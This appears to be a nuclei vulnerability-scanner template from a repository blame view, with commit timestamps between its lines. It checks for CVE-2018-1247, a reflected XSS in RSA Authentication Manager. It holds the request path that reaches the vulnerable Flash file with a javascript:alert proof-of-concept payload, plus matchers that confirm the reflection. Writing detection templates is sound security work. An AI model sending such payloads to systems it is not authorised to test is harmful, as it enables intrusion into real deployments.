nuclei-templates/cves/2018/CVE-2018-1247.yaml

24 lines
511 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-1247
info:
name: RSA Authentication Manager XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
tags: cve,cve2018,xss,flash
requests:
- method: GET
path:
- "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
2020-07-06 19:07:01 +00:00
2020-07-06 19:04:27 +00:00
matchers-condition: and
matchers:
- type: word
words:
2020-04-20 12:19:55 +00:00
- "application/x-shockwave-flash"
part: header
2020-07-06 19:04:27 +00:00
- type: word
words:
- "javascript:alert(1337)"
part: body